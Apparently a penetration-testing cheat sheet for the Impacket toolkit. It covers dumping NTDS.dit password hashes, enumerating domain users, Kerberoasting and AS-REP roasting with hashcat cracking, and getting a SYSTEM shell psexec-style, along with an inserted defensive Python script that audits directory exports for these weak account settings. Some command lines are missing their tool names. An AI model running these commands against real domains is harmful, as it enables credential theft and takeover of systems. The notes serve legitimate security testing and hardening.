Impacket is a collection of Python classes for working with network protocols.

Dump hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL


This script will gather data about the domain’s users and their corresponding email addresses.
-all -dc-ip <ip> <domain>/<user>:<pw>

This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
-request <domain>/<user>:<pw> // -dc-ip <ip>
-> Crack hash e.g. using hashcat, to obtain passwords

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
<domain>

This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
<domain>/<user> -no-pass
-> Crack hash e.g. using hashcat
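
The two account conditions named above (Service Principal Names on normal user accounts, and UF_DONT_REQUIRE_PREAUTH) can be audited from a directory export so they are cleaned up before anyone enumerates them. The following is an added example, not part of Impacket or the original page; the function name `audit`, the LDIF-style input layout and the sample entries are assumptions constructed for illustration, and base64 (`::`) values and folded lines are not handled.

```python
# userAccountControl flag values.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample export (LDIF-style, one blank line between entries).
SAMPLE_LDIF = """\
dn: CN=Svc SQL,CN=Users,DC=example,DC=test
sAMAccountName: svc_sql
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/db01.example.test:1433

dn: CN=Legacy,CN=Users,DC=example,DC=test
sAMAccountName: legacy
userAccountControl: 4194816

dn: CN=Old,CN=Users,DC=example,DC=test
sAMAccountName: old_svc
userAccountControl: 4194818
servicePrincipalName: HTTP/old.example.test

dn: CN=WS01,CN=Computers,DC=example,DC=test
sAMAccountName: WS01$
userAccountControl: 4096
servicePrincipalName: HOST/ws01.example.test
"""

def audit(ldif):
    """Return (no_preauth, user_spn): names of enabled accounts to review."""
    no_preauth, user_spn = [], []
    for block in ldif.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                entry.setdefault(key.lower(), []).append(value.strip())
        name = entry.get("samaccountname", ["?"])[0]
        uac = int(entry.get("useraccountcontrol", ["0"])[0])
        if uac & UF_ACCOUNTDISABLE:
            continue  # disabled accounts are skipped in this report
        if uac & UF_DONT_REQUIRE_PREAUTH:
            no_preauth.append(name)
        # Names ending in "$" are machine accounts, not normal user accounts.
        if entry.get("serviceprincipalname") and not name.endswith("$"):
            user_spn.append(name)
    return no_preauth, user_spn

if __name__ == "__main__":
    print(audit(SAMPLE_LDIF))
```

Accounts in the first list should have pre-authentication re-enabled unless a legacy dependency is documented; accounts in the second list are candidates for long random passwords or managed service accounts.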

Shell

PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo [<domain>/]<user>:[<pw>]@<ip>


sudo <user>:<pw>@<target>